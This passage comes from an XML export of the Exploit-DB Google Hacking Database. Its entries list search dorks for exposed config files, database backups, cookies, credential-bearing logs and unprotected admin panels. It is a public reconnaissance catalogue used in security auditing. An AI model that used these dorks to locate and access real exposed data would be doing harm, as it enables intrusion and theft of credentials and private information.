<querystring>https://www.google.com/search?q=inurl:&quot;/phpinfo.php&quot; &quot;PHP Version&quot;</querystring>
<edb></edb>
<date>2017-04-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>8156</id>
<link>https://www.exploit-db.com/ghdb/8156</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/private&quot; intext:&quot;index of /&quot; &quot;config&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/private&quot; intext:&quot;index of /&quot; &quot;config&quot;
# Files Containing Juicy Info
# Date: 13/04/2023
# Exploit Author: Jerr279</textualDescription>
<query>inurl:&quot;/private&quot; intext:&quot;index of /&quot; &quot;config&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/private&quot; intext:&quot;index of /&quot; &quot;config&quot;</querystring>
<edb></edb>
<date>2023-04-14</date>
<author>Jerr279</author>
</entry>
<entry>
<id>8152</id>
<link>https://www.exploit-db.com/ghdb/8152</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/private&quot; intext:&quot;index of /&quot; &quot;win64&quot; -litespeed</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/private&quot; intext:&quot;index of /&quot; &quot;win64&quot; -litespeed
# Files Containing Juicy Info
# Date:12/04/2023
# Exploit Author: Azar A. Nariman</textualDescription>
<query>inurl:&quot;/private&quot; intext:&quot;index of /&quot; &quot;win64&quot; -litespeed</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/private&quot; intext:&quot;index of /&quot; &quot;win64&quot; -litespeed</querystring>
<edb></edb>
<date>2023-04-12</date>
<author>Azar A. Nariman</author>
</entry>
<entry>
<id>8151</id>
<link>https://www.exploit-db.com/ghdb/8151</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/private&quot; intext:&quot;index of /&quot; inurl:&quot;owncloud&quot; -litespeed</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/private&quot; intext:&quot;index of /&quot; inurl:&quot;owncloud&quot; -litespeed
# Files Containing Juicy Info
# Date:12/04/2023
# Exploit Author: Azar Abdulla</textualDescription>
<query>inurl:&quot;/private&quot; intext:&quot;index of /&quot; inurl:&quot;owncloud&quot; -litespeed</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/private&quot; intext:&quot;index of /&quot; inurl:&quot;owncloud&quot; -litespeed</querystring>
<edb></edb>
<date>2023-04-12</date>
<author>Azar Abdulla</author>
</entry>
<entry>
<id>7440</id>
<link>https://www.exploit-db.com/ghdb/7440</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/responsible disclosure&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/responsible disclosure&quot;
# Files Containing Juicy Info
# Date:11/10/2021
# Exploit Author: Priyanshu Choudhary</textualDescription>
<query>inurl:&quot;/responsible disclosure&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/responsible disclosure&quot;</querystring>
<edb></edb>
<date>2021-10-18</date>
<author>Priyanshu Choudhary</author>
</entry>
<entry>
<id>8144</id>
<link>https://www.exploit-db.com/ghdb/8144</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/scada-vis&quot;</shortDescription>
<textualDescription># Google Dorks: inurl:&quot;/scada-vis&quot;
# Files Containing Juicy Info
# Date:06/04/2023
# Exploit Author: Parsa Rezaie Khiabanloo</textualDescription>
<query>inurl:&quot;/scada-vis&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/scada-vis&quot;</querystring>
<edb></edb>
<date>2023-04-06</date>
<author>Parsa Rezaie Khiabanloo</author>
</entry>
<entry>
<id>3985</id>
<link>https://www.exploit-db.com/ghdb/3985</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/server-info&quot; intext:&quot;Loaded Modules&quot;</shortDescription>
<textualDescription>Search Apache server information though default module info_module:
inurl:&quot;/server-info&quot; intext:&quot;Loaded Modules&quot;
Author: @felmoltor
--
Felipe Molina de la Torre</textualDescription>
<query>inurl:&quot;/server-info&quot; intext:&quot;Loaded Modules&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/server-info&quot; intext:&quot;Loaded Modules&quot;</querystring>
<edb></edb>
<date>2015-01-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>4763</id>
<link>https://www.exploit-db.com/ghdb/4763</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/Setup/Default.aspx&quot; &quot;mojoPortal&quot;</shortDescription>
<textualDescription>MojoPortal installation pages giving juicy info.
Bruno Schmid
</textualDescription>
<query>inurl:&quot;/Setup/Default.aspx&quot; &quot;mojoPortal&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/Setup/Default.aspx&quot; &quot;mojoPortal&quot;</querystring>
<edb></edb>
<date>2018-04-12</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>4432</id>
<link>https://www.exploit-db.com/ghdb/4432</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/sitemap.xsd&quot; ext:xsd</shortDescription>
<textualDescription>Finds files leading to sitemaps... Useful for finding login portals and
stuff.
Dxtroyer</textualDescription>
<query>inurl:&quot;/sitemap.xsd&quot; ext:xsd</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/sitemap.xsd&quot; ext:xsd</querystring>
<edb></edb>
<date>2017-04-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>4468</id>
<link>https://www.exploit-db.com/ghdb/4468</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/Windows/Cookies/&quot; ext:txt -git</shortDescription>
<textualDescription>Cookies from ALL KINDS of sites. Yum! (Think there's only 3 pages of
results? think again!)
Dxtroyer</textualDescription>
<query>inurl:&quot;/Windows/Cookies/&quot; ext:txt -git</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/Windows/Cookies/&quot; ext:txt -git</querystring>
<edb></edb>
<date>2017-05-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>4529</id>
<link>https://www.exploit-db.com/ghdb/4529</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/Windows/Cookies/&quot; ext:txt -telecom -forbidden -git</shortDescription>
<textualDescription>Finds cookies stored by Windows, potentially containing encrypted usernames
&amp; passwords
Dxtroyer</textualDescription>
<query>inurl:&quot;/Windows/Cookies/&quot; ext:txt -telecom -forbidden -git</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/Windows/Cookies/&quot; ext:txt -telecom -forbidden -git</querystring>
<edb></edb>
<date>2017-06-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>8348</id>
<link>https://www.exploit-db.com/ghdb/8348</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/wp-content/debug.log&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/wp-content/debug.log&quot;
# Files Containing Juicy Info
# Date: 20/11/2023
# Exploit: Sathish Kishore</textualDescription>
<query>inurl:&quot;/wp-content/debug.log&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/wp-content/debug.log&quot;</querystring>
<edb></edb>
<date>2023-11-20</date>
<author>Sathish Kishore</author>
</entry>
<entry>
<id>8069</id>
<link>https://www.exploit-db.com/ghdb/8069</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/wp-content/plugins/imagemagick-engine/&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/wp-content/plugins/imagemagick-engine/&quot;
# Files Containing Juicy Info
# Date:21/02/2023
# Exploit Author: Red Blue Ops</textualDescription>
<query>inurl:&quot;/wp-content/plugins/imagemagick-engine/&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/wp-content/plugins/imagemagick-engine/&quot;</querystring>
<edb></edb>
<date>2023-02-21</date>
<author>Red Blue Ops</author>
</entry>
<entry>
<id>8349</id>
<link>https://www.exploit-db.com/ghdb/8349</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/wp-includes/user.php&quot; -site:wordpress.org -site:github.com -site:fossies.org</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/wp-includes/user.php&quot; -site:wordpress.org -site:github.com -site:fossies.org
# Files Containing Juicy Info
# Date: 20/11/2023
# Exploit: Sathish Kishore</textualDescription>
<query>inurl:&quot;/wp-includes/user.php&quot; -site:wordpress.org -site:github.com -site:fossies.org</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/wp-includes/user.php&quot; -site:wordpress.org -site:github.com -site:fossies.org</querystring>
<edb></edb>
<date>2023-11-20</date>
<author>Sathish Kishore</author>
</entry>
<entry>
<id>4678</id>
<link>https://www.exploit-db.com/ghdb/4678</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;/xmlrpc.php?rsd&quot; &amp; ext:php</shortDescription>
<textualDescription>This dork show results which have sensitive information about xmlrpc.php of
CMS Wordpress site.
ManhNho
</textualDescription>
<query>inurl:&quot;/xmlrpc.php?rsd&quot; &amp; ext:php</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/xmlrpc.php?rsd&quot; &amp; ext:php</querystring>
<edb></edb>
<date>2018-02-20</date>
<author>ManhNho</author>
</entry>
<entry>
<id>8148</id>
<link>https://www.exploit-db.com/ghdb/8148</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;:8080/&quot; intext:&quot;index of /&quot; &quot;win64&quot; -LiteSpeed</shortDescription>
<textualDescription># Google Dork: inurl:&quot;:8080/&quot; intext:&quot;index of /&quot; &quot;win64&quot; -LiteSpeed
# Files Containing Juicy Info
# Date:10/04/2023
# Exploit Author: Azar A. Nariman</textualDescription>
<query>inurl:&quot;:8080/&quot; intext:&quot;index of /&quot; &quot;win64&quot; -LiteSpeed</query>
<querystring>https://www.google.com/search?q=inurl:&quot;:8080/&quot; intext:&quot;index of /&quot; &quot;win64&quot; -LiteSpeed</querystring>
<edb></edb>
<date>2023-04-10</date>
<author>Azar A. Nariman</author>
</entry>
<entry>
<id>4821</id>
<link>https://www.exploit-db.com/ghdb/4821</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;?db_backup&quot; | inurl:&quot;dbbackup&quot; -site:github.com &quot;sql.gz&quot; | &quot;sql.tgz&quot; | &quot;sql.tar&quot; | &quot;sql.7z&quot;</shortDescription>
<textualDescription>Some database backups.
Change the SQL extension for another of your choice. (db, mdb, sl3,
sl2, sqlitedb) and so on...
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>inurl:&quot;?db_backup&quot; | inurl:&quot;dbbackup&quot; -site:github.com &quot;sql.gz&quot; | &quot;sql.tgz&quot; | &quot;sql.tar&quot; | &quot;sql.7z&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;?db_backup&quot; | inurl:&quot;dbbackup&quot; -site:github.com &quot;sql.gz&quot; | &quot;sql.tgz&quot; | &quot;sql.tar&quot; | &quot;sql.7z&quot;</querystring>
<edb></edb>
<date>2018-05-16</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>7480</id>
<link>https://www.exploit-db.com/ghdb/7480</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;app.yaml&quot; intext:&quot;runtime: &quot; ext:yaml</shortDescription>
<textualDescription># Google Dork: inurl:&quot;app.yaml&quot; intext:&quot;runtime: &quot; ext:yaml
# Files Containing Juicy Info
# Date:22/10/2021
# Exploit Author: Cristi Vlad</textualDescription>
<query>inurl:&quot;app.yaml&quot; intext:&quot;runtime: &quot; ext:yaml</query>
<querystring>https://www.google.com/search?q=inurl:&quot;app.yaml&quot; intext:&quot;runtime: &quot; ext:yaml</querystring>
<edb></edb>
<date>2021-10-25</date>
<author>Cristi Vlad</author>
</entry>
<entry>
<id>848</id>
<link>https://www.exploit-db.com/ghdb/848</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;bookmark.htm&quot;</shortDescription>
<textualDescription>Bookmarks for Netscape and various other browsers.</textualDescription>
<query>inurl:&quot;bookmark.htm&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%22bookmark.htm%22</querystring>
<edb></edb>
<date>2005-01-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>250</id>
<link>https://www.exploit-db.com/ghdb/250</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;cacti&quot; +inurl:&quot;graph_view.php&quot; +&quot;Settings Tree View&quot; -cvs -RPM</shortDescription>
<textualDescription>This search reveals internal network info including architecture, hosts and services available.</textualDescription>
<query>inurl:&quot;cacti&quot; +inurl:&quot;graph_view.php&quot; +&quot;Settings Tree View&quot; -cvs -RPM</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=inurl%3A%22cacti%22+%2Binurl%3A%22graph_view.php%22+%2B%22Settings+Tree+View%22+-cvs+-RPM</querystring>
<edb></edb>
<date>2004-05-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>8228</id>
<link>https://www.exploit-db.com/ghdb/8228</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;cf/assets&quot; &quot;MultiFileUpload.swf&quot;</shortDescription>
<textualDescription>Google Dork: inurl:&quot;cf/assets&quot; &quot;MultiFileUpload.swf&quot;
# Files Containing Juicy Info
# Date: 11/09/2023
# Exploit Author: Datain Alexandre
</textualDescription>
<query>inurl:&quot;cf/assets&quot; &quot;MultiFileUpload.swf&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;cf/assets&quot; &quot;MultiFileUpload.swf&quot;</querystring>
<edb></edb>
<date>2023-09-11</date>
<author>Datain Alexandre</author>
</entry>
<entry>
<id>3632</id>
<link>https://www.exploit-db.com/ghdb/3632</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;config.php.new&quot; +vbulletin</shortDescription>
<textualDescription>locates the default configuration file for vBulletin (/includes/config.php.new) Author: MaXe</textualDescription>
<query>inurl:&quot;config.php.new&quot; +vbulletin</query>
<querystring>https://www.google.com/search?q=inurl:%22config.php.new%22+%2Bvbulletin</querystring>
<edb></edb>
<date>2010-12-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>6803</id>
<link>https://www.exploit-db.com/ghdb/6803</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;dcwp_twitter.php&quot;</shortDescription>
<textualDescription>Google dork description: Dork to find sites likely running Social Network
Tabs plugin 1.7.1 for WordPress and likely affected by CVE-2018-20555 which
allows remote attackers to discover Twitter access_token,
access_token_secret, consumer_key, and consumer_secret values by reading
the dcwp_twitter.php source code. This leads to Twitter account takeover.
Google Search: inurl:&quot;dcwp_twitter.php&quot;
Submitted by: Alfie
Twitter: https://twitter.com/emenalf
Website: https://the-infosec.com
--
Regards,
Alfie.
the-infosec.com
</textualDescription>
<query>inurl:&quot;dcwp_twitter.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;dcwp_twitter.php&quot;</querystring>
<edb></edb>
<date>2021-02-22</date>
<author>Alfie</author>
</entry>
<entry>
<id>4525</id>
<link>https://www.exploit-db.com/ghdb/4525</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;dcwp_twitter.php?1=&quot;</shortDescription>
<textualDescription>Finds Twitter API logs with private messages, encrypted credentials, and
more!
Dxtroyer</textualDescription>
<query>inurl:&quot;dcwp_twitter.php?1=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;dcwp_twitter.php?1=&quot;</querystring>
<edb></edb>
<date>2017-06-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>4893</id>
<link>https://www.exploit-db.com/ghdb/4893</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;debug/default/view?panel=config&quot;</shortDescription>
<textualDescription>inurl:&quot;debug/default/view?panel=config&quot;
This dork will open the debug page of Yii framework. Which discloses all the requests to Yii framework, in some cases POST request contains clear text username/password, it also discloses server Phpinfo details and database queries.
Thanks
Aamir Rehman
</textualDescription>
<query>inurl:&quot;debug/default/view?panel=config&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;debug/default/view?panel=config&quot;</querystring>
<edb></edb>
<date>2018-07-17</date>
<author>Aamir Rehman</author>
</entry>
<entry>
<id>4514</id>
<link>https://www.exploit-db.com/ghdb/4514</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;idx_config&quot;</shortDescription>
<textualDescription>Finds grabbed config by shell (database,cpanel,smtp....)
Dork: inurl:&quot;idx_config&quot;
Shad Karim
Thanks to :Anon Defacer</textualDescription>
<query>inurl:&quot;idx_config&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;idx_config&quot;</querystring>
<edb></edb>
<date>2017-06-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>3981</id>
<link>https://www.exploit-db.com/ghdb/3981</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;installer-log.txt&quot; intext:&quot;DUPLICATOR INSTALL-LOG&quot;</shortDescription>
<textualDescription>Files found with this google dork will show juicy information about a
migration of a complete wordpress site, including the location of a .zip
file where the complete site is stored including &quot;wp-config.php&quot;,
&quot;.htaccess&quot; and other interesting private files.
This file is the result of a migration with the Wordpress plugin
&quot;Duplicator&quot;.
Author: @felmoltor</textualDescription>
<query>inurl:&quot;installer-log.txt&quot; intext:&quot;DUPLICATOR INSTALL-LOG&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;installer-log.txt&quot; intext:&quot;DUPLICATOR INSTALL-LOG&quot;</querystring>
<edb></edb>
<date>2014-12-31</date>
<author>anonymous</author>
</entry>
<entry>
<id>3917</id>
<link>https://www.exploit-db.com/ghdb/3917</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;jmx-console/HtmlAdaptor&quot; intitle:Mbean</shortDescription>
<textualDescription>JBoss
http://docs.jboss.org/jbossas/docs/Server_Configuration_Guide/4/html/Connecting_to_the_JMX_Server-Inspecting_the_Server___the_JMX_Console_Web_Application.html
--
-[Voluntas Vincit Omnia]-
website http://www.erisresearch.org/
Google+ https://plus.google.com/u/0/114827336297709201563</textualDescription>
<query>inurl:&quot;jmx-console/HtmlAdaptor&quot; intitle:Mbean</query>
<querystring>https://www.google.com/search?q=inurl:&quot;jmx-console/HtmlAdaptor&quot; intitle:Mbean</querystring>
<edb></edb>
<date>2013-11-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>4440</id>
<link>https://www.exploit-db.com/ghdb/4440</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;mail&quot; ext:mai</shortDescription>
<textualDescription>Finds private (so to speak) emails sent from servers
Dxtroyer</textualDescription>
<query>inurl:&quot;mail&quot; ext:mai</query>
<querystring>https://www.google.com/search?q=inurl:&quot;mail&quot; ext:mai</querystring>
<edb></edb>
<date>2017-04-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>4669</id>
<link>https://www.exploit-db.com/ghdb/4669</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;main.php?action=db&quot;</shortDescription>
<textualDescription>This dork will find installations of MySQLDumper (http://www.mysqldumper.de/)
which by default are unprotected. This allows full databse acces. Use
resposible and ethical!
Dork by _palone.
</textualDescription>
<query>inurl:&quot;main.php?action=db&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;main.php?action=db&quot;</querystring>
<edb></edb>
<date>2018-02-09</date>
<author>_palonE</author>
</entry>
<entry>
<id>4462</id>
<link>https://www.exploit-db.com/ghdb/4462</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;Makefile.in&quot; ext:in</shortDescription>
<textualDescription>Finds config files with private server information
Dxtroyer</textualDescription>
<query>inurl:&quot;Makefile.in&quot; ext:in</query>
<querystring>https://www.google.com/search?q=inurl:&quot;Makefile.in&quot; ext:in</querystring>
<edb></edb>
<date>2017-05-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>159</id>
<link>https://www.exploit-db.com/ghdb/159</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;newsletter/admin/&quot;</shortDescription>
<textualDescription>These pages generally contain newsletter administration pages. Some of these site are password protected, others are not, allowing unauthorized users to send mass emails to an entire mailing list. This is a less acurate search than the similar intitle:&quot;newsletter admin&quot; search.</textualDescription>
<query>inurl:&quot;newsletter/admin/&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22newsletter/admin/%22+intitle:%22newsletter+admin%22</querystring>
<edb></edb>
<date>2004-04-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>158</id>
<link>https://www.exploit-db.com/ghdb/158</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;newsletter/admin/&quot; intitle:&quot;newsletter admin&quot;</shortDescription>
<textualDescription>These pages generally contain newsletter administration pages. Some of these site are password protected, others are not, allowing unauthorized users to send mass emails to an entire mailing list.</textualDescription>
<query>inurl:&quot;newsletter/admin/&quot; intitle:&quot;newsletter admin&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22newsletter/admin/%22+intitle:%22newsletter+admin%22&amp;hl=en</querystring>
<edb></edb>
<date>2004-04-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>5267</id>
<link>https://www.exploit-db.com/ghdb/5267</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;paypal.log&quot; ext:log</shortDescription>
<textualDescription># Exploit Title: Expose paypal.log in laravel logs storage
# Google Dork: inurl:&quot;paypal.log&quot; ext:log
# Author: Francis Al Victoriano
</textualDescription>
<query>inurl:&quot;paypal.log&quot; ext:log</query>
<querystring>https://www.google.com/search?q=inurl:&quot;paypal.log&quot; ext:log</querystring>
<edb></edb>
<date>2019-06-24</date>
<author>Francis Al Victoriano</author>
</entry>
<entry>
<id>3838</id>
<link>https://www.exploit-db.com/ghdb/3838</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;php?id=&quot; intext:&quot;DB_Error Object &quot;</shortDescription>
<textualDescription>Description: Files containing juicy info
Author:ruben_linux</textualDescription>
<query>inurl:&quot;php?id=&quot; intext:&quot;DB_Error Object &quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;php?id=&quot; intext:&quot;DB_Error Object &quot;</querystring>
<edb></edb>
<date>2013-04-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>8182</id>
<link>https://www.exploit-db.com/ghdb/8182</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;php?sql=select&quot; ext:php</shortDescription>
<textualDescription># Google Dork: inurl:&quot;php?sql=select&quot; ext:php
# Files Containing Juicy Info
# Date:08/05/2023
# Exploit Author: dmr</textualDescription>
<query>inurl:&quot;php?sql=select&quot; ext:php</query>
<querystring>https://www.google.com/search?q=inurl:&quot;php?sql=select&quot; ext:php</querystring>
<edb></edb>
<date>2023-05-08</date>
<author>dmr</author>
</entry>
<entry>
<id>3789</id>
<link>https://www.exploit-db.com/ghdb/3789</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;phpmyadmin/index.php&quot; intext:&quot;[ Edit ] [ Create PHP Code ] [ Refresh ]&quot;</shortDescription>
<textualDescription>This dork finds unsecured databases</textualDescription>
<query>inurl:&quot;phpmyadmin/index.php&quot; intext:&quot;[ Edit ] [ Create PHP Code ] [ Refresh ]&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;phpmyadmin/index.php&quot; intext:&quot;[ Edit ] [ Create PHP Code ] [ Refresh ]&quot;</querystring>
<edb></edb>
<date>2012-08-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>4677</id>
<link>https://www.exploit-db.com/ghdb/4677</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;plesk-stat&quot;</shortDescription>
<textualDescription>Author: Cr33pb0y
Description: This dork shows server stadistitics and posibly pages paths
and juicy information about users behaviour.
</textualDescription>
<query>inurl:&quot;plesk-stat&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;plesk-stat&quot;</querystring>
<edb></edb>
<date>2018-02-20</date>
<author>Cr33pB0y</author>
</entry>
<entry>
<id>660</id>
<link>https://www.exploit-db.com/ghdb/660</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;putty.reg&quot;</shortDescription>
<textualDescription>This registry dump contains putty saved session data. SSH servers the according usernames and proxy configurations are stored here.</textualDescription>
<query>inurl:&quot;putty.reg&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%22putty.reg%22&amp;start=0&amp;start=0&amp;ie=utf-8&amp;oe=utf-8&amp;rls=org.mozilla:en-US:official</querystring>
<edb></edb>
<date>2004-11-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>6197</id>
<link>https://www.exploit-db.com/ghdb/6197</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;ReportServer/Pages/ReportViewer.aspx&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;ReportServer/Pages/ReportViewer.aspx&quot;
# Description: Various page containing Report viewer
# Author : Anjali Prakash
# Date: 2020-06-04
</textualDescription>
<query>inurl:&quot;ReportServer/Pages/ReportViewer.aspx&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;ReportServer/Pages/ReportViewer.aspx&quot;</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Anjali Prakash</author>
</entry>
<entry>
<id>7489</id>
<link>https://www.exploit-db.com/ghdb/7489</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;robots&quot; | &quot;robot&quot; intext:&quot;admin&quot; AND &quot;Disallow&quot; ext:txt</shortDescription>
<textualDescription># Google Dork: inurl:&quot;robots&quot; | &quot;robot&quot; intext:&quot;admin&quot; AND &quot;Disallow&quot; ext:txt
# Files Containing Juicy Info
# Date:25/10/2021
# Exploit Author: Aftab Alam</textualDescription>
<query>inurl:&quot;robots&quot; | &quot;robot&quot; intext:&quot;admin&quot; AND &quot;Disallow&quot; ext:txt</query>
<querystring>https://www.google.com/search?q=inurl:&quot;robots&quot; | &quot;robot&quot; intext:&quot;admin&quot; AND &quot;Disallow&quot; ext:txt</querystring>
<edb></edb>
<date>2021-10-26</date>
<author>Aftab Alam</author>
</entry>
<entry>
<id>7323</id>
<link>https://www.exploit-db.com/ghdb/7323</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;robots&quot; | &quot;robot&quot; intext:&quot;Disallow:&quot; | &quot;Allow:&quot; ext:txt</shortDescription>
<textualDescription># Dork: inurl:&quot;robots&quot; | &quot;robot&quot; intext:&quot;Disallow:&quot; | &quot;Allow:&quot; ext:txt
# Files Containing Juicy Info
# Date: 15/09/2021
# Exploit Author: Aftab Alam
Description: This Dork shows all web pages that have a publicly disclosed “robots.txt” file, which contains a list of pages on the particular web server that should not be crawled to be indexed by search engines. By having access to this file, someone could possibly:
1. Know the pages that the web server owner intends to hide from search engine results
2. Know the pages that exist on the web server and are poorly hidden using this technique
3. Gain access to pages with privileged login portals (administrator, webmaster, etc.)</textualDescription>
<query>inurl:&quot;robots&quot; | &quot;robot&quot; intext:&quot;Disallow:&quot; | &quot;Allow:&quot; ext:txt</query>
<querystring>https://www.google.com/search?q=inurl:&quot;robots&quot; | &quot;robot&quot; intext:&quot;Disallow:&quot; | &quot;Allow:&quot; ext:txt</querystring>
<edb></edb>
<date>2021-09-29</date>
<author>Aftab Alam</author>
</entry>
<entry>
<id>4890</id>
<link>https://www.exploit-db.com/ghdb/4890</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;root?originalDomain&quot;</shortDescription>
<textualDescription>Dorks giving up domains and hosts information
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>inurl:&quot;root?originalDomain&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;root?originalDomain&quot;</querystring>
<edb></edb>
<date>2018-07-10</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>4151</id>
<link>https://www.exploit-db.com/ghdb/4151</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;server-status&quot; intext:&quot;Apache Server Status&quot;</shortDescription>
<textualDescription>Files containing juicy info
The Status module allows a server administrator to find out how well
their server is performing. A HTML page is presented that gives the
current server statistics in an easily readable form. If required this
page can be made to automatically refresh (given a compatible
browser). Another page gives a simple machine-readable list of the
current server state.
The details given are:
The number of worker serving requests
The number of idle worker
The status of each worker, the number of requests that worker has
performed and the total number of bytes served by the worker (*)
A total number of accesses and byte count served (*)
The time the server was started/restarted and the time it has been running for
Averages giving the number of requests per second, the number of bytes
served per second and the average number of bytes per request (*)
The current percentage CPU used by each worker and in total by Apache (*)
The current hosts and requests being processed (*)
--
Ashish Kumar Sahu</textualDescription>
<query>inurl:&quot;server-status&quot; intext:&quot;Apache Server Status&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;server-status&quot; intext:&quot;Apache Server Status&quot;</querystring>
<edb></edb>
<date>2015-12-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>201</id>
<link>https://www.exploit-db.com/ghdb/201</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;smb.conf&quot; intext:&quot;workgroup&quot; filetype:conf conf</shortDescription>
<textualDescription>These are samba configuration files. They include information about the network, trust relationships, user accounts and much more. Attackers can use this information to recon a network.</textualDescription>
<query>inurl:&quot;smb.conf&quot; intext:&quot;workgroup&quot; filetype:conf</query>
<querystring>https://www.google.com/search?q=inurl%3A%22smb.conf%22+intext%3A%22workgroup%22+filetype%3Aconf+conf</querystring>
<edb></edb>
<date>2004-05-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>4214</id>
<link>https://www.exploit-db.com/ghdb/4214</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:&quot;sugarcrm.log&quot; ext:log -git -google</shortDescription>
<textualDescription>Description: SugarCRM log files
